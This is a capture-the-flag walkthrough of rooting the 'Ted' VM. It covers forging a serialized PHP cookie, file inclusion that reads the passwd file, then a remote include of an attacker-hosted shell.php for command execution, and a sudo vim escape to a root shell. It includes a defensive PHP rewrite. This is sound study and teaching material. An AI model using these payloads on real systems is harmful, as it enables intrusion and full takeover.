Today we are going to take on a new challenge, Ted. The credit for making this VM goes to "Avraham Cohen", and it is a boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Security Level: Beginner/Intermediate

Penetrating Methodology:

Scanning
· Nmap
· Dirb

Enumeration
· Browsing the website
· Burp Suite

Exploitation
· Analyze and change the PHP code to get

Privilege Escalation
· Sudo permission for the vim command
Walkthrough:

Scanning:

First things first, scan the vulnerable machine using nmap:

nmap -p- -A 192.168.2.6

Here we got only two open ports, 80 and 22.

We browsed the website on port 80 and got a message hinting that we might find something in the cookies.

When we intercepted the request, there was a very lengthy value for a cookie. The value of the cookie "user" was base64 encoded.

Decoding the value gave us a username. We tried to change it to something else, but that was not possible.

For the moment we kept it aside and tried to get all the available directories using dirb:

dirb http://192.168.2.6

Here we found one interesting directory named backup.

We visited the backup directory on the web server and found a zip file there.

We downloaded the zip file, extracted the contents and found three files. Let's check the contents of the files, starting from:

1) index.php
2) user.class.php
3) log.class.php
After carefully analysing the code of index.php and user.class.php, we came to know that we can generate the base64 encoded value of the "user" cookie ourselves by moving a function call from index.php into user.class.php. So we added one single line at the end to display the base64 value, encoded in the same format as the user cookie value, but this time for another user, i.e. admin:

echo base64_encode(serialize(new User('admin')));

Now let's run the PHP code and check its output:

php user.class.php

We got a base64 encoded value, which we will try to use as the value of the user cookie.
Well, the base64 cookie value worked, but it was not very helpful, so we started looking for something else. When we checked log.class.php, we found that the Log class has an include call to include a log file, but the parameter type_log is never assigned a value. We assigned the variable the path of the passwd file as its value.

Alongside that we made a small change in the user class: we replaced the call to the Welcome class constructor with a call to the constructor of the Log class.

When we ran user.class.php again, the passwd file was displayed and we got the base64 encoded value which we can use as the cookie:

php user.class.php

When we tried the base64 encoded cookie value on the webpage, we got the passwd file from the target machine, confirming that we have a file inclusion vulnerability.
Now that we have verified the presence of the file inclusion vulnerability, we created a remote code execution file and started the Python server.

Next we edited the Log class to change the file path variable to the URL of our shell:

private $type_log = "http://192.168.2.3/shell.php";

With the code in place, it is time to get the cookie value to execute it:

php user.class.php

When we used the cookie value and supplied the ifconfig command in the cmd parameter, the command ran on the target machine.
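As an added example (not code from the Ted VM or its author), here is the cookie-handling and log-inclusion idiom the walkthrough exploits shown beside a hardened PHP version: the cookie carries signed JSON instead of a serialized object, and the Log class only reads files from an allow-list. The class and property names (User, Log, type_log) follow the walkthrough's description; the secret and log file names are placeholders.

```php
<?php
// Added example, not the VM's code. Names (User, Log, type_log) follow the
// walkthrough's description; the secret and log names are placeholders.

// The idiom the walkthrough abuses: the client controls the class graph and every
// property value, so a forged cookie can steer an include() to any path or URL.
function loadUserUnsafe(string $cookie) {
    return unserialize(base64_decode($cookie));
}

// Hardened 1: the cookie carries plain data, not objects, and is authenticated
// with an HMAC so it cannot be forged or modified client-side.
const COOKIE_KEY = 'placeholder-load-a-random-secret-from-config';

function makeUserCookie(string $name): string {
    $payload = json_encode(['user' => $name, 'iat' => time()]);
    return base64_encode($payload) . '.' . hash_hmac('sha256', $payload, COOKIE_KEY);
}

function loadUserSafe(string $cookie): ?array {
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    $payload = base64_decode($parts[0], true);
    if ($payload === false
        || !hash_equals(hash_hmac('sha256', $payload, COOKIE_KEY), $parts[1])) {
        return null;                        // malformed or tampered: treat as logged out
    }
    $data = json_decode($payload, true);    // no object is instantiated from the cookie
    return (is_array($data) && isset($data['user'])) ? $data : null;
}

// Hardened 2: a log file is data, so it is read rather than include()d, and the
// name must be on an allow-list, so no caller-supplied path or URL reaches the
// filesystem. Keep allow_url_include=Off in php.ini as a second line of defence.
class Log {
    private const ALLOWED = ['app.log', 'error.log'];
    private $type_log;
    public function __construct(string $type_log) {
        if (!in_array($type_log, self::ALLOWED, true)) {
            throw new InvalidArgumentException('unknown log name');
        }
        $this->type_log = $type_log;
    }
    public function read(): string {
        return file_get_contents(__DIR__ . '/logs/' . $this->type_log);
    }
}
```

With this layout, a cookie that decodes to a different username fails the HMAC check, and a Log object can only ever open the two listed files regardless of what a request contains.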
While checking the contents of the machine, we found a file named credentials.txt.bak.

We checked its contents and found something like a set of credentials. Let's try to use these credentials.

We used the credentials for SSH and got access. While enumerating, we found the first flag:

ssh sk4@192.168.2.6
ls
cat flag.txt

Now we have to escalate privileges, so we checked the sudo permissions of the current user. We found that we have sudo permissions for the vim editor:

sudo -l

We used privilege escalation through the vim editor and got a root shell:

sudo vim
:!/bin/bash
cd /root
ls
cat fl4g.txt